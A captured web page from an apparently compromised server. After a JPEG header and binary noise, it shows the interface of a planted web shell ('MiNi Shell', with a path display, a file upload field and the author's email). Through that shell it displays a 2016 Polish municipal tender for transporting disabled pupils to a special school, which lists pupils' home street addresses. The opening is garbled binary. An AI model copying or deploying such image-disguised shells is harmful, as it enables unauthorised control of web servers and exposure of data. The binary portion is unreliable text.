JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160530/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160530/137344-N-2016.html

<p class="kh_header"><b>Góra Kalwaria: PRZEWÓZ CODZIENNY UCZNIÓW NIEPEŁNOSPRAWNYCH DO SZKOŁY SPECJALNEJ NA TRASIE III - PIASECZNO W ROKU SZKOLNYM  2016/2017</b><br>
<b>Numer ogłoszenia: 137344 - 2016; data zamieszczenia: 30.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Placówek Oświatowych , ul. Księdza Zygmunta Sajny 4, 05-530 Góra Kalwaria, woj. mazowieckie, tel. 22 7567431, faks 22 7567431.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gorakalwaria.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEWÓZ CODZIENNY UCZNIÓW NIEPEŁNOSPRAWNYCH DO SZKOŁY SPECJALNEJ NA TRASIE III - PIASECZNO W ROKU SZKOLNYM  2016/2017.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PRZEWÓZ CODZIENNY UCZNIÓW NIEPEŁNOSPRAWNYCH DO SZKOŁY SPECJALNEJ NA TRASIE III - PIASECZNO W ROKU SZKOLNYM  2016/2017 (Z WYJĄTKIEM DNI WOLNYCH OD ZAJĘĆ DYDAKTYCZNYCH) zgodnie  z grafikiem:

CZĘŚĆ A 
Coniew  17 (2) i 35 (2);  
Pęcław 61 i 76; 
Cendrowice ul. Sosnowa 9; 
Wilczynek 2 (2 osoby);  
Łubna ul. Podleśna 3;  
Baniocha ul. Puławska 13a (2 osoby); 
Baniocha ul. Środkowa 5;   
Szymanów 47 (2);   
Solec 13A (2)   k/Baniochy
do  Specjalnego  Ośrodka  Szkolno - Wychowawczego w Piasecznie ul. Szpitalna 12    i  z  powrotem

Ilość kursów:
dowóz : 1
powrót : 1   w  tym  ze znakiem (2)  i  pozostałe objaśnienia   patrz uwaga

CZĘŚĆ  B 
Brześce ul. Wilanowska 38; 
Brześce ul. Wilanowska 100 (2);  
Góra  Kalwaria ul. K. St. Wyszyńskiego 3/4 (2);  
Góra Kalwaria ul. Budowlanych 3; 
Góra Kalwaria Dominikańska 42a (2);  
Góra Kalwaria ul. Skierniewicka nr 5 i nr 17 (2); 
Góra Kalwaria  ul. Batorego 8 (1) (1) (2 osoby);  
Góra Kalwaria ul. Mariańska 40  (2 osoby); 
Kąty ul. Akacjowa 90;  
Łubna ul. Łubińska nr 5, nr 6 i nr 8  
do  Specjalnego  Ośrodka  Szkolno - Wychowawczego w Piasecznie ul. Szpitalna 12   i  z  powrotem

Ilość kursów  :
dowóz : 1
powrót : 1   w  tym  ze znakiem (2) i  pozostałe objaśnienia   patrz uwaga

Ilość  dzieci  ogółem  łącznie  w  Części  A i B:  28  +  2  kierowców  +  2 opiekunów

Pojazd:  Bus /Autobus 
Ilość: 2  pojazdy 
1 pojazd minimum 20 osobowy (ilość miejsc siedzących dla uczniów),
1 pojazd minimum 13 osobowy (ilość miejsc siedzących dla uczniów). 

Powrót może odbywać się jednym pojazdem na dwóch kursach. Pierwszy kurs ok. godz. 13:00 (należy godz. uzgodnić z dyrekcją szkoły). Przewidzianych jest ośmiu uczniów oznaczonych (2) na trasach A i B jak powyżej. Po zakończeniu pierwszego kursu pierwotnego ten sam pojazd może ok. godz. 16:00 odwieźć 20 uczniów            z połączonych tras A i B jak powyżej.

Uwaga : 
znak (1) oznacza, że z tej miejscowości uczeń  dowożony  jest do szkoły                  w poniedziałki, odbierany w piątki,  ponieważ korzysta z  internatu  szkoły
znak (2) oznacza, że uczniowie tych miejscowości mają wcześniejszy kurs powrotny ze szkoły  do  domu   pojazdem  części A lub B
dowóz  do  szkoły:
usługę  dowozu  świadczą  równolegle  w  tym  samym czasie  (w części A i B)  2  pojazdy
powrót ze szkoły: 
I   kurs powrotny  (wcześniejszy)
usługę  odwozu ze szkoły  świadczy  1  pojazd (uczniowie części A+B),   godzina  odjazdu  z  placówki ok.  13:00 -  godzina  do  ustalenia  z  dyrekcją  szkoły
II  kurs  powrotny  (późniejszy)  
usługę  odwozu  świadczy  1  pojazd  (uczniowie części  A+B),   godzina  odjazdu  z placówki ok. 16:00 -  godzina  do ustalenia  z  dyrekcją  szkoły

Godziny dowozu i odwozu należy konsultować z dyrektorami szkół i rodzicami dzieci.
Kolejność przystanków oraz godziny odjazdów mogą być zmienione przez Zamawiającego po rozstrzygnięciu przetargu, jak również w czasie trwania zawartej umowy, celem dostosowania trasy do potrzeb szkoły i uczniów. 

NALEŻY  PAMIĘTAĆ  O  OZNAKOWANIU  POJAZDÓW - tablicami informacyjnymi  o  przewozie dzieci. 
W okresach jesiennych i zimowych pojazdy dowożące dzieci muszą być ogrzewane, a na stopniach wejściowych do pojazdów nie może zalegać lód i nie mogą być one śliskie.

Dzieci będą odbierane od rodziców/prawnych opiekunów spod domu o ustalonej wcześniej godzinie i po dowiezieniu na zajęcia będą przekazane pod opiekę nauczyciela lub innej upoważnionej osoby do ich odbioru. Po zakończeniu zajęć dzieci będą odebrane od nauczycieli w szkole lub innych osób do tego upoważnionych i po odwiezieniu pod dom przekazane pod opiekę rodziców/prawnych opiekunów lub upoważnionych osób. Nie dopuszcza się przekazania dzieci w drodze powrotnej ze szkoły do domu osobom nieupoważnionym.
W trakcie przewozu na trasie dom-szkoła-dom Wykonawca zapewnia: 
min. 2 busy/autobusy sprawne technicznie i  jakościowo z zachowaniem obowiązujących norm, zgodnie z obowiązującym prawem przewozowym                    i drogowym (aktualne badania techniczne pojazdów, aktualne  ubezpieczenia  pojazdów OC i NW ), które muszą łącznie  posiadać miejsca  do przewozu  min. 28 uczniów w pozycji siedzącej + 2 kierowców + 2 opiekunów;
min. 2 kierowców posiadających uprawnienia zgodnie z obowiązującym prawem do kierowania busem/autobusem oraz min. 2 opiekunów przeszkolonych z zakresu pierwszej pomocy medycznej (po jednym kierowcy i opiekunie na pojazd).
Przedmiotowe zamówienie nie może być realizowane jako łączone np. przewóz dzieci,  młodzieży  i  innych   mieszkańców (osób postronnych).

Zamawiający wyklucza możliwość łączenia funkcji kierowcy i opiekuna. Funkcję opiekuna może sprawować wyłącznie osoba pełnoletnia, która jest zdolna do ponoszenia odpowiedzialności karnej, cywilnej za działanie lub zaniechanie w związku ze sprawowaną opieką. 
W trakcie przewozu osoba pełniąca funkcję opiekuna będzie zobowiązana do: 
sprawdzenia stanu liczbowego uczniów w chwili odbioru dzieci ze szkoły;
dopilnowania porządku i pomocy przy wsiadaniu i zajmowaniu przez uczniów miejsc w pojeździe (w tym celu opiekun wychodzi z pojazdu i upewnia się czy dzieci bezpiecznie weszły, zajęły miejsca, sam wchodzi do pojazdu ostatni, zamyka drzwi);
zapewnienia bezpieczeństwa w trakcie przewozu dzieci; 
opieki i zwracania uwagi na właściwe zachowanie się dzieci w czasie przejazdu, a w przypadku stwierdzenia sytuacji zagrażającej bezpieczeństwu dzieci  w pojeździe, niedopuszczenie do przewozu dzieci lub zapewnienie bezpiecznego jego opuszczenie;
zapewnienia bezpiecznego wysiadania uczniów z pojazdu (opiekun na każdym przystanku wychodzi pierwszy z pojazdu, upewnia się czy dzieci bezpiecznie mogą wyjść z pojazdu i dopiero po tym uczniowie mogą opuścić pojazd);
przeprowadzenia uczniów przez jezdnię;
w przypadku awaryjnej ewakuacji dzieci z pojazdu zobowiązany jest do zapewnienia im niezbędnej opieki.
Wykonawca zobowiązany będzie zawsze w pierwszej kolejności zabrać opiekuna        i następnie dopiero po tym może rozpocząć odbieranie uczniów z ustalonych przystanków. Wykonawca nie może przystąpić do wykonywania usługi będącej przedmiotem umowy bez obecności opiekuna.
W czasie przewozu uczniów (zarówno do szkoły jak i z powrotem) Wykonawca bierze pełną odpowiedzialność za ich bezpieczeństwo zgodnie z prawem przewozowym. 
Wykonawca w razie awarii własnego pojazdu zobowiązuje się do zapewnienia ciągłości świadczenia usług i zorganizowania zastępstwa zapewniającego co najmniej równorzędny poziom usług. W tym celu musi zapewnić pojazd zastępczy do przewozu uczniów, odpowiednio przystosowany do wykonania przewozu, sprawny technicznie i oznakowany. Nie zapewnienie pojazdu zastępczego spowoduje obciążenie Wykonawcy karą umowną i kosztami za wynajem zastępczego środka transportu.

Wykonawca zobowiązuje się do świadczenia usługi przewozowej pojazdami sprawnymi technicznie, zapewniającymi bezpieczeństwo uczniów i spełniającymi wymagania szczegółowe jak dla pojazdów do przewozu dzieci i młodzieży szkolnej z miejscami dostosowanymi do ilości przewożonych dzieci w pozycji siedzącej oraz musi posiadać wymagane dokumenty potwierdzające odpowiednie kwalifikacje zawodowe kierowcy i właściwy stan techniczny pojazdów, zgodnie z przepisami ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2013 r. , poz.1414 ze zm.).
Wykonawca musi posiadać aktualne ubezpieczenie OC i NW na wszystkie pojazdy używane do wykonania usługi na cały okres trwania umowy. Wykonawca zobowiązany jest na własny koszt ubezpieczyć pojazdy i pasażerów od wszelkich szkód powstałych podczas przewozu i pozostających w związku z przewozem. Zamawiający nie ponosi żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu, w wyniku których nastąpi uszkodzenie ciała lub śmierć czy szkoda materialna spowodowana działalnością Wykonawcy. 

Zamawiający ma prawo do kontroli sposobu realizacji przewozów, przede wszystkim do kontroli terminowości i punktualności przejazdów, a także do sprawdzenia dokumentów związanych z wykonaniem umowy, w tym wymaganych pozwoleń. Zamawiający zastrzega sobie również prawo do kontroli osób oraz pojazdów realizujących zamówienie,  tj. ogólnego stanu zewnętrznego i wewnętrznego pojazdu, a także przeprowadzenia w każdej chwili kontroli stanu technicznego i czystości pojazdu oraz stanu trzeźwości kierowcy i opiekuna przez odpowiednie służby (w szczególności Policję, Inspekcję Transportu Drogowego) lub pracownika Zamawiającego.

Zaleca się wizytację miejsca realizacji zadania tj. tras przejazdu, w celu oszacowania na własną odpowiedzialność kosztów i ryzyka oraz uzyskania wszelkich danych, jakie mogą być niezbędne w przygotowaniu oferty i podpisaniu umowy na wykonanie zadania. Wszystkie koszty związane z opracowaniem oferty i zaleconą wizją lokalną ponosi Wykonawca, niezależnie od wyniku postępowania przetargowego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający w przypadku potrzeby realizacji zadań nie przewidzianych w niniejszej SIWZ przewiduje i dopuszcza możliwość udzielenia zamówień uzupełniających do 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać uprawnienia do wykonywania działalności polegającej na krajowym transporcie drogowym osób tj. licencję lub zezwolenie na wykonywanie krajowego transportu drogowego osób.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum jedną usługę polegającą na przewozie dzieci lub młodzieży odpowiadającemu rodzajem przedmiotowi zamówienia o wartości nie mniejszej niż 50 000,00 zł brutto (słownie: pięćdziesiąt tysięcy złotych), potwierdzoną poświadczeniami od poprzednio zamawiających</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie odpowiednim potencjałem technicznym w celu realizacji zamówienia tj. musi posiadać min. 2 busy/autobusy sprawne technicznie i  jakościowo z zachowaniem obowiązujących norm, zgodnie                 z obowiązującym prawem przewozowym i drogowym (aktualne badania techniczne pojazdów, aktualne  ubezpieczenia  pojazdów OC i NW oraz wszelkie dokumenty wymagane przepisami prawa), które  łącznie muszą posiadać miejsca  do przewozu  min. 28 uczniów w pozycji siedzącej + 2 kierowców + 2 opiekunów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie osobami zdolnymi do wykonania zamówienia tj. musi dysponować min. 2 kierowcami posiadającymi uprawnienia zgodnie z obowiązującym prawem do kierowania busem/autobusem oraz min. 2 opiekunami posiadającymi przeszkolenie z zakresu pierwszej pomocy medycznej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż 30 000,00 zł (słownie: trzydzieści tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Rok produkcji pojazdów - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany niniejszej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
gdy nastąpią zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
gdy nastąpi zmiana podwykonawców, pod warunkiem uzyskania akceptacji Zamawiającego,
gdy wystąpią zdarzenia losowe lub siły wyższe, których skutków nie da się przewidzieć, ani im zapobiec,
w przypadku zmiany ustawowej stawki podatku VAT,
gdy nastąpi zmiana danych adresowych Zamawiającego lub Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gorakalwaria.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi Placówek Oświatowych  ul. Księdza Zygmunta Sajny 4 (w sekretariacie),  05-530 Góra Kalwaria.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2016 godzina 10:15, miejsce: Zespół Obsługi Placówek Oświatowych  ul. Księdza Zygmunta Sajny 4 (w sekretariacie),  05-530 Góra Kalwaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com